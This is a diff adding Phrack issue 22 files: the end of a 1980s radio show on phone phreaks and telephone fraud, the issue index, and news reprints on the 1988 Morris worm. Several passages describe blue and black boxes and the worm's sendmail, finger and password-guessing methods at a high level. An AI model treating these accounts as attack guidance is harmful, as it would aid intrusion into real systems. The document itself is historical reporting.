+JM: This happens quite a bit.  A person like Anna for example might use a long
+    distance service that is subscribing to a service from the originating
+    telephone company of identification of calling number.  When the fraudulent
+    bill is generated the number that placed the call is also there and working
+    it backwards is very trivial at that point.
+L:  They simply did something like putting a trap on the line.
+JM: On some of the systems, the trap is already there. It's just part of the
+    system, it's not really a trap at all.
+ES: There are ways to catch people and the computer hackers like to play the
+    odds.  All right Louis thank you.
+L:  Hopefully this will teach a lot of people who are considering doing
+    something like this to keep their hands off.
+ES: I hope so, good point.  Thanks for the call.
+L:  Thank you very much
+ES: We've got a call here.  Hello Bob!
+B:  I'd like to make a few comments on computer law.  I live in Oaklawn and
+    they've got the most modern exchanges that Illinois Bell has to offer.  My
+    son lives in that area and I know they offer features that are only
+    available on the newer switches out there.  I go back with computers to
+    before Apple and IBM sold PC's, I had a couple sitting here at home.
+ES: Uh-humm.
+B:  I bought my first modem about 1978.  I consider myself somewhat a hacker,
+    but I've never really tried to get into anybody else's system, not so much
+    that I considered it illegal, simply because there wasn't that much of
+    interest to me available.  As far as computers go, if I sit here and dial
+    random phone numbers in some states, now that is illegal.  It's illegal if
+    your 14 year old is sitting at home at a computer, but it's not illegal if
+    your using a computerized phone system for generating sales leads.
+ES: We call it tele-marketing.
+B:  Tele-marketing is essentially what some hackers have been hassled for and n
+    some states it is illegal now.  I've accidentally accessed systems I did
+    not intend to access.
+CM: You didn't pursue that right?
+B:  No, I've never used it.  I've never used a computer for theft of services.
+    I am not about to try and defend somebody that uses a computer to as a tool
+    for theft of service from a telecommunications company. However, there are
+    certain computer laws that never should have been passed.  The case of the
+    fellow out in California two or three years back that had a bulletin board,
+    somebody had posted access codes on his bulletin board.  He has an
+    automated machine that answers his telephone.  The telephone line is in his
+    name, the Secret Service came and confiscated his equipment Its not right
+    that this happened because of third party theft of service.
+BG: I think the rationale is over simplistic.
+B:  Am I responsible for what you say when I answer my phone is essentially the
+    question.
+BG: No, I think the question is, is the bulletin board operator responsible for
+    what is posted on his bulletin board.
+B:  Well that literally makes no sense.  If a telemarketer calls me am I
+    responsible for anything he says after I pick up the phone?
+BG: A bulletin board is used to disseminate information further.  When a person
+    posts something, in this case a code, the bulletin board is used to further
+    spread that information.
+JM: I believe that is the Tom Tcimpidis case that you're referring to and I'm
+    quite familiar with it.  It was not quite as you put it.  The stolen AT&T
+    calling card that was posted was posted anonymously one minute and one
+    minute after the AT&T card being posted by the anonymous party, Tom
+    Tcimpidis, the sysop, the operator of the bulletin board himself had been
+    on-line and had posted other messages.  So there was reason to believe
+    perhaps that the anonymous person was actually the system operator.  There
+    was a further complication that arose in that the stolen AT&T card belonged
+    to a former employer of the system operator.  Ultimately there was not
+    enough evidence with which to charge anybody and the whole thing was
+    quietly dropped, but it did raise some interesting questions as to
+    responsibilities of the system operator because Mr. Tcimpidis said that he
+    didn't know the code was there and yet his own equipment log showed that he
+    had been on-line.
+B:  Let's take that a little further then.  Let's say there was an answering
+    machine connected to his phone and we know he listened to the answering
+    machine. Let's say somebody with a voice message left him half a dozen
+    stolen credit card numbers.  Would the action of the law enforcement
+    agencies have been the same?
+JM: No...no, you're
+B:  I think you must look at a situation where over the years an unnecessary
+    fear has grown of some of the hackers.  The phone phreaks scare me to an
+    extent.  I've got bogus calls on my US. Sprint and All-Net bills, never got
+    one on my AT&T bill.  I can see this is a definite problem, the phone
+    phreaks do scare me, and I realize that real problem is that nobody seems
+    to reconcile every call or even read their long distance bills.
+AA: If I have an answering machine on my phone and somebody calls up and leaves
+    me information that were I to use it it would be illegal and I either erase
+    the information or turn that other person in.  I have no intent to use it
+    and there is no law enforcement officer that I can imagine who is going to
+    take action and no prosecutor who would take the case.
+ES: In other words if a guy sets up a computer bulletin board for the express
+    purpose of exchanging information he is not supposed to have when other
+    people have information their not supposed to have, I don't think there's
+    any doubt about what their intent is and about the fact that they are
+    violating the law.
+
+    Sarge, if you went after somebody like Anna for what she admitted doing,
+    stealing $15,000 dollars worth of long distance and you were able to handle
+    the investigation, come up with the evidence, and bust her,  what kind of
+    penalty might she get?
+AA: A very difficult question to answer because it depends upon her prior
+    criminal history.  Most of these hackers do not have a history.  In Anna's
+    case the crime would be a class four felony which would result in probably
+    simple felony probation.
+ES: She admitted to stealing $15,000!
+AA: I'm sure that her estimate is wildly off on the low end. if she is
+    disseminating codes then she is also somewhat responsible for other
+    people's use of the same codes.
+ES: Could we charge someone like her with conspiracy?
+AA: Sure!
+ES: She is generating a continuing criminal enterprise.
+AA: It depends again on whether you choose to prosecute her federally or at the
+    state level.  She would be looking here at a class three or class two
+    felony depending upon the sum of money that she had stolen.
+ES: The bottom line here is if the punishment doesn't fit the crime, its not
+    going to stop the criminals.
+AA: You have to remember that these are the people who have not been processed
+    in the criminal justice systems and even to hold them over the weekend in
+    Cook County would not be an experience I'd care to repeat.
+ES: Many of them are pretty arrogant sounding it seems.
+
+                    (Commercial Break And Reintroductions)
+
+ES: We've got an interesting new telephone law here; Chapter 38 of the Illinois
+    Criminal Code.  A person can be prosecuted, arrested and convicted for
+    bothering somebody even if the person doesn't answer the phone.  Just
+    ringing a persons phone now is against the law, it's harassing them.
+JM: I might add, since we're discussing harassment by phone... the hackers
+    don't like me too well and I'll get about a death threat a week from a
+    hacker.
+ES: Really.
+JM: Oh yeah and every now and then I figure out who it was and I call them back
+    and that kind of shakes up a little bit.
+ES: There was this reporter here that was being harassed like crazy in the news
+    department here by a hacker who had a computer that was ringing the phone.
+    He was ringing the phones like crazy and I didn't know about.  Finally the
+    reporter asked what I could recommend.  I made a phone call and the
+    Illinois Bell Security did what it had to do and then the Chicago Police
+    were brought in and one night when I was on the air the officers went to
+    guys home, knocked on the door, and this kid was shocked!  He was a
+    telemarketing representative for a major magazine and apparently he was
+    working at home he had some of their equipment at home including a rapid
+    dialer.  He's got two detectives at the front door and he had literally
+    just gotten off the phone.  We've got all the data and so now comes the
+    decision what do you want to do.  Take him to court?  Lock him up?  Go to
+    his boss?  I went back to the reporter in our news room and asked him what
+    he wanted to do about it?
+JM: What did he say?
+ES: Write a 500 word essay on why he was never going to do it again.
+JM: Ha Ha!  We had one 14 year old one hacker who was on the bulletin boards
+    and posting messages about how to make pipe bombs, different types of
+    poison, long distance codes, and computer passwords, etc.  On the bulletin
+    boards he would come across like Ghengis Khan or or Joseph Stalin or
+    something.  I mean his language was all four letter words and yet face to
+    face he was a very meek, mild mannered, well behaved youngster.  However,
+    get him behind the keyboard and he just sort of changes personality.  What
+    do you do to a 14 year old?  He is much too young to really be put through
+    any of the the serious criminal prosecutions so his penalty was that he had
+    to read out loud to his parents all of the messages that he'd posted on the
+    bulletin boards, four letters words and all.  And that cured him... hahaha.
+
+    In most of the cases I've worked on it's rare that someone goes to jail.  I
+    think the longest sentence that I've been involved with was probably like
+    30 days.  I think there was one fellow down in Virginia, if I recall
+    correctly, that got 90 days.  You don't necessarily want to put these
+    folks in jail because then they'll meet the real crooks and teach them all
+    these nifty tricks.
+ES: God help us.  Lets grab a call real quick here from Gordon.  Hello Gordon,
+    where are you calling from?
+G:  Hello, I'm calling from DeKalb, Illinois.
+ES: You have a question for our panel...go ahead.
+G:  Yeah I do.  I'm a graduate student in Criminology up here at Northern
+    Illinois University and I'm kinda involved in some field research with the
+    types of people that you're discussing tonight.  I've heard a lot of terms
+    flying back and forth between phreakers and hackers and things like that.
+    I'd like to hear some input from the people on the panel as far as how they
+    define these types of activities, if they draw and distinctions between the
+    two, and secondly, if anybody can add any insight into maybe just how many
+    people are currently active in this type of activity.
+JM: I could take that because one of my specialties is identification and
+    gathering data about how many perpetrators there are.  To answer the first
+    question, a computer hacker would be someone who concentrates mainly on
+    breaking into computer systems.  The phone phreak would be someone who,
+    like Anna we heard earlier tonight, just makes long distance calls for
+    free.  The problem is you can't really separate them.  The hacker needs to
+    know the phone phreak tricks in order to break into computers in other
+    states or other countries.  Certainly the phone phreak perhaps needs some
+    computer aids in obtaining stolen codes.  It is hard to separate them.  You
+    can call them phreakers or you can call them hackers or you can just call
+    them criminals.
+
+    As to how many, this is a tough one because at what point to you draw the
+    line?  Do you say somebody that makes fifteen thousand dollars worth of
+    calls in a year is a phone phreak and somebody that makes $14,900 is not?
+    The problem is that its been a tradition to rip off the phone company ever
+    since day one.  There has been phone phreaks for twenty-five or thirty
+    years at least.  Ever since we've had long distance dialing.
+BG: The phone companies not the only one under siege either.
+JM: There are thousands of hackers, I would say just in the state of Illinois
+    there are several thousand active computer hackers.
+G:  Those hackers are the active ones?  Would you say that most of them are
+    involved in communicating via the bulletin board systems and voice
+    mail-boxes and things like that or is this pretty much a solitary activity.
+JM: There are a few solitary hackers, in fact the beginnings of hacking, 25-30
+    years ago, it was a solitary activity.  The bulletin boards have changed
+    all that.  Now the hackers no longer really operate in solitude.
+AA: One thing also about the criminal element here, the hacker and the
+    phreakers, my experience has been that we have had very few "clean" if you
+    will, computer frauds.  We have had some people who are only into
+    multi-level marketing of codes, which ends up being enormous sums of money,
+    but very often we've found that hackers are involved in other things too.
+    For example, credit card frauds, we have done search warrants and found a
+    reasonable quantities of illegal substances, of weapons, of other evidence
+    of other offenses.  We have probably easily 50% of our warrants turn up
+    other things besides computer fraud.  Which I think is an interesting point
+    to keep in mind.
+ES: Very good point.
+
+                  (Break For Commercial and re-introductions)
+
+R:  Hello, I just wanted to call up and clarify something concerning computer
+    hackers.  I'm a hacker, but I'm not a criminal.
+ES: We'll be the judge of that Bobby.
+R:  I think you will be.  The reason I say that is, you're confusing things.
+    The hacker is term that you could apply or compare more or less to "ham."
+    It's a computer hobbyist, whether he does it just on his machine at home or
+    he accesses legitimate services throughout the country and pays for his
+    services he's a hacker.  There are a lot of people who are irresponsible,
+    mostly teenagers, who are quite impressed with the power of this machine
+    and get carried away with it and do criminal acts.  They happen to be
+    hackers, but they're also criminals.  I think that distinction.
+CM: I think the point is well taken I think originally the hacker was a very
+    positive term historically and for whatever reasons the word hacker has
+    taken on some negative connotations.
+R:  Yes and that is unfair because I know legions of people who are hackers.
+JM: I consider myself to be a hacker, but I'm certainly not a computer criminal
+    (No, at least not a COMPUTER criminal).  I mean my business is catching the
+    criminal hackers.  If we go back to 1983 when hackers made headlines for
+    the first time, that was the Milwaukee 414 gang, they called themselves
+    hackers and so right away the good term, hacker being someone who could do
+    wonderful things with a computer got turned into someone who could do
+    criminal things with a computer.
+ES: I remember back to a time a few years ago when there was a group of
+    criminals that got busted for coming up with a device called a black box
+    which they used to circumvent paying the tolls you know on long distance
+    phone charges.  Was that kind of the beginning of this computer
+    misbehavior?  I mean was that a computer device?
+JM: There are several boxes; the black box, blue box, red box, silver box, etc.
+    I must confess that back when I was a teenager, over thirty years ago,
+    there were not any computers to play around with, but there was this
+    wonderful telephone network called the Bell System.  I was one of the
+    original inventors of the device known as the black box and another device
+    known as the blue box (Yeah right, YOU invented these).  In those days the
+    phone network was such that you could manipulate it with very simple tone
+    signals.
+
+    A black box essentially allows all calls to your phone to be received free
+    of charge to the caller.  In other words if somebody called you from a
+    payphone they got their dimes back and if someone dialed you direct long
+    distance they never got a bill.
+
+    The blue box was a little more insidious.  It allows you to actually take
+    over the long distance lines and dial direct anywhere in the world.
+    I got into it just out of curiosity as a true hacker and I found out that
+    these things were possible and I told a friend of mine at the phone company
+    about what I could do with their circuits and of course he turned me into
+    the security people.
+
+    It never really got started, but I do have sitting here in front of me a
+    device that makes some of those tones.  You could call it a blue box.  I
+    guess this is legitimate piece of test equipment, but let's see if it will
+    pick up. (Beeeep!)
+ES: Came through loud and clear.
+JM: The blue box today is obsolete, it really doesn't work anymore.  There,
+    there are a few circuits that still us those kind of signals, but back
+    25-30 years ago that was the way to make your free phone calls. You didn't
+    have Sprint and MCI to abuse.
+S:  I'm a consulting engineer now but, I have been a communications manager for
+    three Fortune 500 companies.  One of the reasons I was hired was to put a
+    stop to some long distance calling that had cost that company over a
+    million and a half dollars in 27 months.  We found the person that was
+    doing it and he got a suspended sentence of six months.  Then we turned
+    around and sued him in civil court.
+ES: We've got to start treating these criminals like criminals.  Suspended
+    sentences are unacceptable, hard jail time is absolutely mandatory and
+    unfortunately, and I think that sergeant you probably will agree with me,
+    it must be very frustrating to spend all the hours you do chasing people
+    and even when you get them to plead guilty seeing how easy sometimes they
+    get away.
+AA: Oh sure.
+S:  How many people do you have assigned to your unit here in this state sarge?
+AA: You're talking to 50% of the unit.
+
+                 (Break for commercials and re-introductions)
+
+ES: Okay Ray, go ahead.
+R:  You would not believe how long I've been trying to get in touch with you.
+    Since I was 14 years old, every time I've called, you've been busy.
+ES: So how old are you tonight?
+R:  18
+ES: Four years!?  What's on your mind?
+R:  I used to pirate games when I was younger. As a matter of fact when I was
+    14.  I mean my Dad had just bought me a computer and modem and I was
+    pumped.  People are always complaining about it, but it's so easy for a 14
+    year old kid to do this, don't you think that they should make it a little
+    bit harder?  Do you understand what I'm trying to say?
+ES: Yes, but Ray it's easy to steal a car.  If your neighbor leaves his car in
+    the driveway with the key in the ignition does that give you the right to
+    take it?
+R:  I know I did wrong, but there is no way I can give it back.  Its just
+    stupid because when you get older you feel guilty about things.
+ES: What did you used to do?
+R:  I used to call up certain places and I would like break in and take their
+    games and then just keep them for myself.
+BG: It was more entertainment for you?
+R:  It kept me occupied and it was so easy that I began to think that maybe it
+    was meant to be easy so they could get publicity.
+JM: There is perhaps a difference because when you copy a a computer program
+    you can't tell it from an original, but if you make a copy of a tape or a
+    record it doesn't sound quite the same.
+CM: When you're 14 years old it's something new, right?
+R:  I got the biggest pump out of it.
+CM: I think you did something for your ego and it gave you a sense of power.
+ES: Okay Ray
+R:  Bye
+ES: I've really enjoyed this program, but we're out of time.  John, I want to
+    thank you for staying up and I have a feeling that we'll do more radio
+    because you're an interesting guy.
+JM: Thank you.  It's been interesting talking with you.  By the way, I think I
+    know who Anna is, but we'll keep that a secret from our listeners.
+ES: Oh.  Well why don't you just tell the FBI?
+JM: The Secret Service, yes.
+ES: Right and I want to thank everyone else for being on the show tonight.
+Everyone: Its been our pleasure.  Lets do it again some time.
+_______________________________________________________________________________
diff --git a/phrack22/1.txt b/phrack22/1.txt
new file mode 100644
index 0000000..8062a56
--- /dev/null
+++ b/phrack22/1.txt
@@ -0,0 +1,58 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 22, File 1 of 12
+
+
+                    Phrack Inc. Newsletter Issue XXII Index
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                               December 23, 1988
+
+             Happy Holidays And Welcome To Phrack Inc. Issue XXII!
+
+As the golden days of the phreak/hack community fall behind us, it appears that
+many of the "old elites" have found themselves in highly respected jobs and
+throughout the course of time, their handles became synonymous with their real
+names.  As the saying goes, "You can't keep a good hacker down," and many of
+these people are still interested in being a part of the community.
+
+In order to help protect the anonymity of these people who are interested in
+writing for Phrack, we have brought back the concept of ">Unknown User<."  This
+nametag will fill the spot for any author who desires to submit a file, but
+does not wish for his handle to be seen in the file itself.  So if fear of
+publicity has held you back from submitting an article, don't worry any longer.
+
+We here at Phrack Inc. would like to give The Mentor a special commendation for
+an extremely well written file.  The spirit of The Phoenix Project continues
+within a really decent guide for new hackers.
+
+Due to the large amounts of controversy regarding the recent rampage of the
+InterNet Worm, this issue of Phrack contains a lot of information about the
+Worm and its effects, the majority of which is scattered within the pages of
+Phrack World News, but we were also able to get a hold of Bob Page's Report.
+
+For anyone who has a legitimate account on MCI Mail, GTE Telemail, or any of
+the standard Bitnet reachable places, let us know and we can have Phrack
+delivered to your mailbox.
+
+For those of you wishing to submit files to Phrack Inc., please send them to
+us at our Bitnet accounts or if that is not possible, contact The Mentor on the
+Phoenix Project BBS (512-441-3088).  Once again, its great to be back!
+
+                                             Taran King & Knight Lightning
+
+                                  C488869@UMCVMB.BITNET & C483307@UMCVMB.BITNET
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+This issue contains the following files;
+
+1.  Index by Taran King and Knight Lightning
+2.  Phrack Pro-Phile on Karl Marx by Taran King & Knight Lightning
+3.  The Judas Contract (Part 2 of the Vicious Circle Trilogy) by KL
+4.  A Novice's Guide To Hacking (1989 Edition) by The Mentor
+5.  An Indepth Guide In Hacking Unix by Red Knight
+6.  Yet Another File On Hacking Unix by >Unknown User<
+7.  Computer Hackers Follow A Guttman-Like Progression by Richard C. Hollinger
+8.  A Report On The InterNet Worm by Bob Page
+9-12 Phrack World News Issue XXII by Knight Lightning and Taran King
+_______________________________________________________________________________
diff --git a/phrack22/10.txt b/phrack22/10.txt
new file mode 100644
index 0000000..fb52280
--- /dev/null
+++ b/phrack22/10.txt
@@ -0,0 +1,463 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 22, File 10 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXII/Part 2                PWN
+            PWN                                                 PWN
+            PWN           Created by Knight Lightning           PWN
+            PWN                                                 PWN
+            PWN              Written and Edited by              PWN
+            PWN         Knight Lightning and Taran King         PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Computer Network Disrupted By "Virus"                          November 3, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By John Markoff  (New York Times)
+
+In an intrusion that raises new questions about the vulnerability of the
+nation's computers, a nationwide Department of Defense data network has been
+disrupted since Wednesday night by a rapidly spreading "virus" software program
+apparently introduced by a computer science student's malicious experiment.
+
+The program reproduced itself through the computer network, making hundreds of
+copies in each machine it reached, effectively clogging systems linking
+thousands of military, corporate and university computers around the country
+and preventing them from doing additional work.  The virus is thought not to
+have destroyed any files.
+
+By late Thursday afternoon computer security experts were calling the virus the
+largest assault ever on the nation's computers.
+
+"The big issue is that a relatively benign software program can virtually bring
+our computing community to its knees and keep it there for some time," said
+Chuck Cole, deputy computer security manager at Lawerence Livermore Laboratory
+in Livermore, Calif., one of the sites affected by the intrusion.  "The cost is
+going to be staggering."
+
+Clifford Stoll, a computer security expert at Harvard University, added, "There
+is not one system manager who is not tearing his hair out.  It's causing
+enormous headaches."
+
+The affected computers carry routine communications among military officials,
+researchers and corporations.
+
+While some sensitive military data are involved, the nation's most sensitive
+secret information, such as that on the control of nuclear weapons, is thought
+not to have been touched by the virus.
+
+Computer viruses are so named because they parallel in the computer world the
+behavior of biological viruses.  A virus is a program, or a set of instructions
+to a computer, that is deliberately planted on a floppy disk meant to be used
+with the computer or introduced when the computer is communicating over
+telephone lines or data networks with other computers.
+
+The programs can copy themselves into the computer's master software, or
+operating system, usually without calling any attention to themselves. From
+there, the program can be passed to additional computers.
+
+Depending upon the intent of the software's creator, the program might cause a
+provocative but otherwise harmless message to appear on the computer's screen.
+Or it could systematically destroy data in the computer's memory.
+
+The virus program was apparently the result of an experiment by a computer
+science graduate student trying to sneak what he thought was a harmless virus
+into the Arpanet computer network, which is used by universities, military
+contractors and the Pentagon, where the software program would remain
+undetected.
+
+A man who said he was an associate of the student said in a telephone call to
+The New York Times that the experiment went awry because of a small programming
+mistake that caused the virus to multiply around the military network hundreds
+of times faster than had been planned.
+
+The caller, who refused to identify himself or the programmer, said the student
+realized his error shortly after letting the program loose and that he was now
+terrified of the consequences.
+
+A spokesman at the Pentagon's Defense Communications Agency, which has set up
+an emergency center to deal with the problem, said the caller's story was a
+"plausible explanation of the events."
+
+As the virus spread Wednesday night, computer experts began a huge struggle to
+eradicate the invader.
+
+A spokesman for the Defense Communications Agency in Washington acknowledged
+the attack, saying, "A virus has been identified in several host computers
+attached to the Arpanet and the unclassified portion of the defense data
+network known as the Milnet."
+
+He said that corrections to the security flaws exploited by the virus are now
+being developed.
+
+The Arpanet data communications network was established in 1969 and is designed
+to permit computer researchers to share electronic messages, programs and data
+such as project information, budget projections and research results.
+
+In 1983 the network was split and the second network, called Milnet, was
+reserved for higher-security military communications.  But Milnet is thought
+not to handle the most classified military information, including data related
+to the control of nuclear weapons.
+
+The Arpanet and Milnet networks are connected to hundreds of civilian networks
+that link computers around the globe.
+
+There were reports of the virus at hundreds of locations on both coasts,
+including, on the East Coast, computers at the Massachusetts Institute of
+Technology, Harvard University, the Naval Research Laboratory in Maryland and
+the University of Maryland and, on the West Coast, NASA's Ames Research Center
+in Mountain View, Calif.; Lawrence Livermore Laboratories; Stanford University;
+SRI International in Menlo Park, Calif.; the University of California's
+Berkeley and San Diego campuses and the Naval Ocean Systems Command in San
+Diego.
+
+A spokesman at the Naval Ocean Systems Command said that its computer systems
+had been attacked Wednesday evening and that the virus had disabled many of the
+systems by overloading them.  He said that computer programs at the facility
+were still working on the problem more than 19 hours after the original
+incident.
+
+The unidentified caller said the Arpanet virus was intended simply to "live"
+secretly in the Arpanet network by slowly copying itself from computer to
+computer.  However, because the designer did not completely understand how the
+network worked, it quickly copied itself thousands of times from machine to
+machine.
+
+Computer experts who disassembled the program said that it was written with
+remarkable skill and that it exploited three security flaws in the Arpanet
+network.  [No. Actually UNIX] The virus' design included a program designed to
+steal passwords, then masquerade as a legitimate user to copy itself to a
+remote machine.
+
+Computer security experts said that the episode illustrated the vulnerability
+of computer systems and that incidents like this could be expected to happen
+repeatedly if awareness about computer security risks was not heightened.
+
+"This was an accident waiting to happen; we deserved it," said Geoffrey
+Goodfellow, president of Anterior Technology Inc. and an expert on computer
+communications.
+
+"We needed something like this to bring us to our senses.  We have not been
+paying much attention to protecting ourselves."
+
+Peter Neumann, a computer security expert at SRI International Inc. in Menlo
+Park International, said, "Thus far the disasters we have known have been
+relatively minor.  The potential for rather extraordinary destruction is rather
+substantial."
+
+"In most of the cases we know of, the damage has been immediately evident. But
+if you contemplate the effects of hidden programs, you could have attacks going
+on and you might never know it."
+_______________________________________________________________________________
+
+Virus Attack                                                   November 6, 1988
+~~~~~~~~~~~~
+>From the Philadelphia Inquirer (Inquirer Wire Services)
+
+ITHACA, N.Y. - A Cornell University graduate student whose father is a top
+government computer-security expert is suspected of creating the "virus" that
+slowed thousands of computers nationwide, school officials said yesterday.
+
+The Ivy League university announced that it was investigating the computer
+files of 23-year-old Robert T. Morris, Jr., as experts across the nation
+assessed the unauthorized program that was injected Wednesday into a military
+and university system, closing it for 24 hours.  The virus slowed an estimated
+6,000 computers by replicating itself and taking up memory space, but it is not
+believed to have destroyed any data.
+
+M. Stuart Lynn, Cornell vice president for information technologies, said
+yesterday that Morris' files appeared to contain passwords giving him
+unauthorized access to computers at Cornell and Stanford Universities.
+
+"We also have discovered that Morris' account contains a list of passwords
+substantially similar to those found in the virus," he said at a news
+conference.
+
+Although Morris "had passwords he certainly was not entitled to," Lynn
+stressed, "we cannot conclude from the existence of those files that he was
+responsible."
+
+FBI spokesman Lane Betts said the agency was investigating whether any federal
+laws were violated.
+
+Morris, a first-year student in a doctoral computer-science program, has a
+reputation as an expert computer hacker and is skilled enough to have written
+the rogue program, Cornell instructor Dexter Kozen said.
+
+When reached at his home yesterday in Arnold, Md., Robert T. Morris, Sr., chief
+scientist at the National Computer Security Center in Bethesda, Md., would not
+say where his son was or comment on the case.
+
+The elder Morris has written widely on the security of the Unix operating
+system, the target of the virus program.  He is widely known for writing a
+program to decipher passwords, which give users access to computers.
+_______________________________________________________________________________
+
+New News From Hacker Attack On Philips France, 1987            November 7, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+A German TV magazine reported (last week) that the German hackers which
+attacked, in summer 1987, several computer systems and networks (including
+NASA, the SPANET, the CERN computers which are labeled "European hacker
+center," as well as computers of Philips France and Thompson-Brandt/France) had
+transferred design and construction plans of the MegaBit chip having been
+developed in the Philips laboratories.  The only information available is that
+detailed graphics are available to the reporters showing details of the MegaBit
+design.
+
+Evidently it is very difficult to prosecute this data theft since German law
+does not apply to France based enterprises.  Moreover, the German law may
+generally not be applicable since its prerequit may not be true that PHILIPS'
+computer system has "special protection mechanisms."  Evidently, the system was
+only be protected with UID and password, which may not be a sufficient
+protection (and was not).
+
+Evidently, the attackers had much more knowledge as well as instruments (e.g.
+sophisticated graphic terminals and plotters, special software) than a "normal
+hacker" has.  Speculations are that these hackers were spions rather than
+hackers of the Chaos Computer Club (CCC) which was blamed for the attack.
+Moreover, leading members of CCC one of whom was arrested for the attack,
+evidently have not enough knowledge to work with such systems.
+
+                            Information Provided By
+                        Klaus Brunnstein, Hamburg, FRG
+_______________________________________________________________________________
+
+The Computer Jam:  How It Came About                           November 8, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By John Markoff  (New York Times)
+
+Computer scientists who have studied the rogue program that crashed through
+many of the nation's computer networks last week say the invader actually
+represents a new type of helpful software designed for computer networks.
+
+The same class of software could be used to harness computers spread around the
+world and put them to work simultaneously.
+
+It could also diagnose malfunctions in a network, execute large computations on
+many machines at once and act as a speedy messenger.
+
+But it is this same capability that caused thousands of computers in
+universities, military installations and corporate research centers to stall
+and shut down the Defense Department's Arpanet system when an illicit version
+of the program began interacting in an unexpected way.
+
+"It is a very powerful tool for solving problems," said John F. Shoch, a
+computer expert who has studied the programs.  "Like most tools it can be
+misued, and I think we have an example here of someone who misused and abused
+the tool."
+
+The program, written as a "clever hack" by Robert Tappan Morris, a 23-year-old
+Cornell University computer science graduate student, was originally meant to
+be harmless.  It was supposed to copy itself from computer to computer via
+Arpanet and merely hide itself in the computers.  The purpose?  Simply to prove
+that it could be done.
+
+But by a quirk, the program instead reproduced itself so frequently that the
+computers on the network quickly became jammed.
+
+Interviews with computer scientists who studied the network shutdown and with
+friends of Morris have disclosed the manner in which the events unfolded.
+
+The program was introduced last Wednesday evening at a computer in the
+artificial intelligence laboratory at the Massachusetts Institute of
+Technology.  Morris was seated at his terminal at Cornell in Ithaca, N.Y., but
+he signed onto the machine at MIT.  Both his terminal and the MIT machine were
+attached to Arpanet, a computer network that connects research centers,
+universities and military bases.
+
+Using a feature of Arpanet, called Sendmail, to exchange messages among
+computer users, he inserted his rogue program.  It immediately exploited a
+loophole in Sendmail at several computers on Arpanet.
+
+Typically, Sendmail is used to transfer electronic messages from machine to
+machine throughout the network, placing the messages in personal files.
+
+However, the programmer who originally wrote Sendmail three years ago had left
+a secret "backdoor" in the program to make it easier for his work.  It
+permitted any program written in the computer language known as C to be mailed
+like any other message.
+
+So instead of a program being sent only to someone's personal files, it could
+also be sent to a computer's internal control programs, which would start the
+new program.  Only a small group of computer experts -- among them Morris --
+knew of the backdoor.
+
+As they dissected Morris's program later, computer experts found that it
+elegantly exploited the Sendmail backdoor in several ways, copying itself from
+computer to computer and tapping two additional security provisions to enter
+new computers.
+
+The invader first began its journey as a program written in the C language.
+But it also included two "object" or "binary" files -- programs that could be
+run directly on Sun Microsystems machines or Digital Equipment VAX computers
+without any additional translation, making it even easier to infect a computer.
+
+One of these binary files had the capability of guessing the passwords of users
+on the newly infected computer.  This permits wider dispersion of the rogue
+program.
+
+To guess the password, the program first read the list of users on the target
+computer and then systematically tried using their names, permutations of their
+names or a list of commonly used passwords.  When successful in guessing one,
+the program then signed on to the computer and used the privileges involved to
+gain access to additonal computers in the Arpanet system.
+
+Morris's program was also written to exploit another loophole.  A program on
+Arpanet called Finger lets users on a remote computer know the last time that a
+user on another network machine had signed on.  Because of a bug, or error, in
+Finger, Morris was able to use the program as a crowbar to further pry his way
+through computer security.
+
+The defect in Finger, which was widely known, gives a user access to a
+computer's central control programs if an excessively long message is sent to
+Finger.  So by sending such a message, Morris's program gained access to these
+control programs, thus allowing the further spread of the rogue.
+
+The rogue program did other things as well.  For example, each copy frequently
+signaled its location back through the network to a computer at the University
+of California at Berkeley.  A friend of Morris said that this was intended to
+fool computer researchers into thinking that the rogue had originated at
+Berkeley.
+
+The program contained another signaling mechanism that became its Achilles'
+heel and led to its discovery.  It would signal a new computer to learn whether
+it had been invaded.  If not, the program would copy itself into that computer.
+
+But Morris reasoned that another expert could defeat his program by sending the
+correct answering signal back to the rogue.  To parry this, Morris programmed
+his invader so that once every 10 times it sent the query signal it would copy
+itself into the new machine regardless of the answer.
+
+The choice of 1 in 10 proved disastrous because it was far too frequent.  It
+should have been one in 1,000 or even one in 10,000 for the invader to escape
+detection.
+
+But because the speed of communications on Arpanet is so fast, Morris's illicit
+program echoed back and forth through the network in minutes, copying and
+recopying itself hundreds or thousands of times on each machine, eventually
+stalling the computers and then jamming the entire network.
+
+After introducing his program Wednesday night, Morris left his terminal for an
+hour.  When he returned, the nationwide jamming of Arpanet was well under way,
+and he could immediately see the chaos he had started.  Within a few hours, it
+was clear to computer system managers that something was seriously wrong with
+Arpanet.
+
+By Thursday morning, many knew what had happened, were busy ridding their
+systems of the invader and were warning colleagues to unhook from the network.
+They were also modifying Sendmail and making other changes to their internal
+software to thwart another invader.
+
+The software invader did not threaten all computers in the network.  It was
+aimed only at the Sun and Digital Equipment computers running a version of the
+Unix operating system written at the University of California at Berkeley.
+Other Arpanet computers using different operating systems escaped.
+
+These rogue programs have in the past been referred to as worms or, when they
+are malicious, viruses. Computer science folklore has it that the first worms
+written were deployed on the Arpanet in the early 1970s.
+
+Researchers tell of a worm called "creeper," whose sole purpose was to copy
+itself from machine to machine, much the way Morris's program did last week.
+When it reached each new computer it would display the message:  "I'm the
+creeper.  Catch me if you can!"
+
+As legend has it, a second programmer wrote another worm program that was
+designed to crawl through the Arpanet, killing creepers.
+
+Several years later, computer researchers at the Xerox Corp.'s Palo Alto
+Research Center developed more advanced worm programs.  Shoch and Jon Hupp
